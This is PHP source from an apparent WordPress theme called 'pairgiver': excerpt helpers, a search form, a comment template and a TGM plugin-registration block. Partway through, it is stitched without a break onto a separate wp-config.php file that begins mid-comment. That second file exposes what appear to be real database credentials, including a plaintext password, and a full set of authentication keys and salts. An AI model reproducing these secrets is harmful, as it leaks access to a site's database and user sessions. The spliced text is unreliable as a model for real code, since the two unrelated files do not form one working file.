  if(isset($pairgiver_redux_demo['services_excerpt'])){
    $limit = $pairgiver_redux_demo['services_excerpt'];
  }else{
    $limit = 17;
  }
  $excerpt = explode(' ', get_the_excerpt(), $limit);
  if (count($excerpt)>=$limit) {
    array_pop($excerpt);
    $excerpt = implode(" ",$excerpt).'...';
  } else {
    $excerpt = implode(" ",$excerpt);
  }
  $excerpt = preg_replace('`[[^]]*]`','',$excerpt);
  return $excerpt;
}
function pairgiver_excerpt4() {
  $pairgiver_redux_demo = get_option('redux_demo');
  if(isset($pairgiver_redux_demo['stories_excerpt'])){
    $limit = $pairgiver_redux_demo['stories_excerpt'];
  }else{
    $limit = 9;
  }
  $excerpt = explode(' ', get_the_excerpt(), $limit);
  if (count($excerpt)>=$limit) {
    array_pop($excerpt);
    $excerpt = implode(" ",$excerpt).'...';
  } else {
    $excerpt = implode(" ",$excerpt);
  }
  $excerpt = preg_replace('`[[^]]*]`','',$excerpt);
  return $excerpt;
}
function pairgiver_excerpt5() {
  $pairgiver_redux_demo = get_option('redux_demo');
  if(isset($pairgiver_redux_demo['event_excerpt'])){
    $limit = $pairgiver_redux_demo['event_excerpt'];
  }else{
    $limit = 6;
  }
  $excerpt = explode(' ', get_the_excerpt(), $limit);
  if (count($excerpt)>=$limit) {
    array_pop($excerpt);
    $excerpt = implode(" ",$excerpt).'...';
  } else {
    $excerpt = implode(" ",$excerpt);
  }
  $excerpt = preg_replace('`[[^]]*]`','',$excerpt);
  return $excerpt;
}
function pairgiver_search_form( $form ) {
    $form = '
        <form action="' . esc_url(home_url('/')) . '">
            <input type="text" class="s-input-home" name="s" required value="' . get_search_query() . '" placeholder="'.esc_attr__('Search…', 'pairgiver').'">
            <button class="btn-s-input" type="submit"><i class="fa fa-search"></i></button>
        </form>
	';
    return $form;
}
add_filter( 'get_search_form', 'pairgiver_search_form' );
function pairgiver_theme_comment($comment, $args, $depth) {
    //echo 's';
   $GLOBALS['comment'] = $comment; ?>
    <?php if(get_avatar($comment,$size='100' )!=''){?>
      <li>
          <div class="comments-box d-sm-flex mb-45">
              <div class="comments-box__avatar mr-30">
                  <?php echo get_avatar($comment,$size='90');?>
              </div>
              <div class="comments-box__text">
                  <h6 class="comments-semi-title"><?php printf( get_comment_author_link()) ?></h6>
                  <?php comment_text() ?>
                  <?php comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth']))) ?>
              </div>
          </div>
      </li>
  <?php }else{?>
      <li>
          <div class="comments-box d-sm-flex mb-45">
              <div class="comments-box__text">
                  <h6 class="comments-semi-title"><?php printf( get_comment_author_link()) ?></h6>
                  <?php comment_text() ?>
                  <?php comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth']))) ?>
              </div>
          </div>
      </li>
<?php }?>

<?php
}

/**
 * This file represents an example of the code that themes would use to register
 * the required plugins.
 *
 * It is expected that theme authors would copy and paste this code into their
 * functions.php file, and amend to suit.
 *
 * @package    TGM-Plugin-Activation
 * @subpackage Example
 * @version    2.6.1
 * @author     Thomas Griffin <thomasgriffinmedia.com>
 * @author     Gary Jones <gamajo.com>
 * @copyright  Copyright (c) 2014, Thomas Griffin
 * @license    http://opensource.org/licenses/gpl-2.0.php GPL v2 or later
 * @link       https://github.com/thomasgriffin/TGM-Plugin-Activation
 */
/**
 * Include the TGM_Plugin_Activation class.
 */
require_once get_template_directory() . '/framework/class-tgm-plugin-activation.php';
add_action( 'tgmpa_register', 'pairgiver_theme_register_required_plugins' );
/**
 * Register the required plugins for this theme.
 *
 * In this example, we register two plugins - one included with the TGMPA library
 * and one from the .org repo.
 *
 * The variable passed to tgmpa_register_plugins() should be an array of plugin
 * arrays.
 *
 * This function is hooked into tgmpa_init, which is fired within the
 * TGM_Plugin_Activation class constructor.
 */
 
 
function pairgiver_theme_register_required_plugins() {
    /**
     * Array of plugin arrays. Required keys are name and slug.
     * If the source is NOT from the .org repo, then source is also required.
     */
    $plugins = array(
        // This is an example of how to include a plugin from the WordPress Plugin Repository.
      array(
            'name'      => esc_html__( 'One Click Demo Import', 'pairgiver' ),
            'slug'      => 'one-click-demo-import',
            'required'  => true,
        ), 
      array(
            'name'      => esc_html__( 'Classic Editor', 'pairgiver' ),
            'slug'      => 'classic-editor',
            'required'  => true,
        ), 
      array(
            'name'      => esc_html__( 'Classic Widgets', 'pairgiver' ),
            'slug'      => 'classic-widgets',
            'required'  => true,
        ),
      array(
            'name'      => esc_html__( 'Widget Importer & Exporter', 'pairgiver' ),
            'slug'      => 'widget-importer-&-exporter',
            'required'  => true,
        ), 
      array(
            'name'      => esc_html__( 'Contact Form 7', 'pairgiver' ),
            'slug'      => 'contact-form-7',
            'required'  => true,
        ), 
      array(
            'name'      => esc_html__( 'WP Maximum Execution Time Exceeded', 'pairgiver' ),
            'slug'      => 'wp-maximum-execution-time-exceeded',
            'required'  => true,
        ), 
      array(
            'name'                     => esc_html__( 'Elementor', 'pairgiver' ),
            'slug'                     => 'elementor',
            'required'                 => true,
            'source'                   => get_template_directory() . '/framework/plugins/elementor.zip',
        ),
      array(
            'name'                     => esc_html__( 'Pairgiver Common', 'pairgiver' ),
            'slug'                     => 'pairgiver-common',
            'required'                 => true,
            'source'                   => get_template_directory() . '/framework/plugins/pairgiver-common.zip',
        ),
      array(
            'name'                     => esc_html__( 'Pairgiver Elementor', 'pairgiver' ),
            'slug'                     => 'pairgiver-elementor',
            'required'                 => true,
            'source'                   => get_template_directory() . '/framework/plugins/pairgiver-elementor.zip',
        ),
    );
    /**
     * Array of configuration settings. Amend each line as needed.
     * If you want the default strings to be available under your own theme domain,
     * leave the strings uncommented.
     * Some of the strings are added into a sprintf, so see the comments at the
     * end of each line for what each argument will be.
     */
    $config = array(
        'default_path' => '',                      // Default absolute path to pre-packaged plugins.
        'menu'         => 'tgmpa-install-plugins', // Menu slug.
        'has_notices'  => true,                    // Show admin notices or not.
        'dismissable'  => true,                    // If false, a user cannot dismiss the nag message.
        'dismiss_msg'  => '',                      // If 'dismissable' is false, this message will be output at top of nag.
        'is_automatic' => false,                   // Automatically activate plugins after installation or not.
        'message'      => '',                      // Message to output right before the plugins table.
        'strings'      => array(
            'page_title'                      => esc_html__( 'Install Required Plugins', 'pairgiver' ),
            'menu_title'                      => esc_html__( 'Install Plugins', 'pairgiver' ),
            'installing'                      => esc_html__( 'Installing Plugin: %s', 'pairgiver' ), // %s = plugin name.
            'oops'                            => esc_html__( 'Something went wrong with the plugin API.', 'pairgiver' ),
            'notice_can_install_required'     => _n_noop( 'This theme requires the following plugin: %1$s.', 'This theme requires the following plugins: %1$s.', 'pairgiver' ), // %1$s = plugin name(s).
            'notice_can_install_recommended'  => _n_noop( 'This theme recommends the following plugin: %1$s.', 'This theme recommends the following plugins: %1$s.', 'pairgiver' ), // %1$s = plugin name(s).
            'notice_cannot_install'           => _n_noop( 'Sorry, but you do not have the correct permissions to install the %s plugin. Contact the administrator of this site for help on getting the plugin installed.', 'Sorry, but you do not have the correct permissions to install the %s plugins. Contact the administrator of this site for help on getting the plugins installed.', 'pairgiver' ), // %1$s = plugin name(s).
            'notice_can_activate_required'    => _n_noop( 'The following required plugin is currently inactive: %1$s.', 'The following required plugins are currently inactive: %1$s.', 'pairgiver' ), // %1$s = plugin name(s).
            'notice_can_activate_recommended' => _n_noop( 'The following recommended plugin is currently inactive: %1$s.', 'The following recommended plugins are currently inactive: %1$s.', 'pairgiver' ), // %1$s = plugin name(s).
            'notice_cannot_activate'          => _n_noop( 'Sorry, but you do not have the correct permissions to activate the %s plugin. Contact the administrator of this site for help on getting the plugin activated.', 'Sorry, but you do not have the correct permissions to activate the %s plugins. Contact the administrator of this site for help on getting the plugins activated.', 'pairgiver' ), // %1$s = plugin name(s).
            'notice_ask_to_update'            => _n_noop( 'The following plugin needs to be updated to its latest version to ensure maximum compatibility with this theme: %1$s.', 'The following plugins need to be updated to their latest version to ensure maximum compatibility with this theme: %1$s.', 'pairgiver' ), // %1$s = plugin name(s).
            'notice_cannot_update'            => _n_noop( 'Sorry, but you do not have the correct permissions to update the %s plugin. Contact the administrator of this site for help on getting the plugin updated.', 'Sorry, but you do not have the correct permissions to update the %s plugins. Contact the administrator of this site for help on getting the plugins updated.', 'pairgiver' ), // %1$s = plugin name(s).
            'install_link'                    => _n_noop( 'Begin installing plugin', 'Begin installing plugins', 'pairgiver' ),
            'activate_link'                   => _n_noop( 'Begin activating plugin', 'Begin activating plugins', 'pairgiver' ),
            'return'                          => esc_html__( 'Return to Required Plugins Installer', 'pairgiver' ),
            'plugin_activated'                => esc_html__( 'Plugin activated successfully.', 'pairgiver' ),
            'complete'                        => esc_html__( 'All plugins installed and activated successfully. %s', 'pairgiver' ), // %s = dashboard link.
            'nag_type'                        => 'updated' // Determines admin notice type - can only be 'updated', 'update-nag' or 'error'.
        )
    );
    tgmpa( $plugins, $config );
}



 * @link https://wordpress.org/documentation/article/editing-wp-config-php/
 *
 * @package WordPress
 */

// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'ockeysrus_db' );

/** Database username */
define( 'DB_USER', 'ockeysrus_user' );

/** Database password */
define( 'DB_PASSWORD', 'T^,jWy+H6hE=' );

/** Database hostname */
define( 'DB_HOST', 'localhost' );

/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );

/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );

/**#@+
 * Authentication unique keys and salts.
 *
 * Change these to different unique phrases! You can generate these using
 * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}.
 *
 * You can change these at any point in time to invalidate all existing cookies.
 * This will force all users to have to log in again.
 *
 * @since 2.6.0
 */
define('AUTH_KEY',         '54,kR+|$~?=Y/}RM}QQ/9f%mW/{VYHqwO*If|MlA}lJsAe</?gL6Bg9)zs~S2=Z,');
define('SECURE_AUTH_KEY',  'dHL#nVXcw}p!!vl#.pwKsd67{hw<v)jf_z$s>)jS5xhJL7$xtA~qC|WFiy#ix&`T');
define('LOGGED_IN_KEY',    '^8W?45>Pr; _B$?<C8b|S?Cq~DS[!yK~Y*2P]bQXRLs*lB^A!m|+kWKW7LQ6%){k');
define('NONCE_KEY',        'VnvTgmq#QAU*0AT}3C-r)t*{f`5$+bS<+Y]?4,z4:/.?I-T:9Na=[EH/.!pU#MSh');
define('AUTH_SALT',        'p00AWdBIe&d pQ+^r]](-E%.fuHy*Ri|yY,7~XQ1-Ya!.2UfFN>I+oC$A5Z8k(AI');
define('SECURE_AUTH_SALT', 'h`&$V-*0#!w%$#mX_v{q%pt9o;SQ?}oWx51`k%KD.I?PIu=|s~}f4-bQ04eTlBlh');
define('LOGGED_IN_SALT',   'I}B9K-:sD)jO@E:Ht:SIY-]q&buHG={OzB15:rLty!o-]Ovd-dd7Q>-W6;7Ip0BA');
define('NONCE_SALT',       'Z#lHMW-uMYHwS+KJrv;`9{^ R3.>F2~Lyh@cze#2l*.ceSh^wvFs-mxQr>V[2>5+');

/**#@-*/

/**
 * WordPress database table prefix.
 *
 * You can have multiple installations in one database if you give each
 * a unique prefix. Only numbers, letters, and underscores please!
 */
$table_prefix = 'wp_';

/**
 * For developers: WordPress debugging mode.
 *
 * Change this to true to enable the display of notices during development.
 * It is strongly recommended that plugin and theme developers use WP_DEBUG
 * in their development environments.
 *
 * For information on other constants that can be used for debugging,
 * visit the documentation.
 *
 * @link https://wordpress.org/documentation/article/debugging-in-wordpress/
 */
define( 'WP_DEBUG', false );

/* Add any custom values between this line and the "stop editing" line. */

define( 'WP_AUTO_UPDATE_CORE', true );
define('WP_MEMORY_LIMIT', '256M');

/* That's all, stop editing! Happy publishing. */

/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
	define( 'ABSPATH', __DIR__ . '/' );
}

/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';
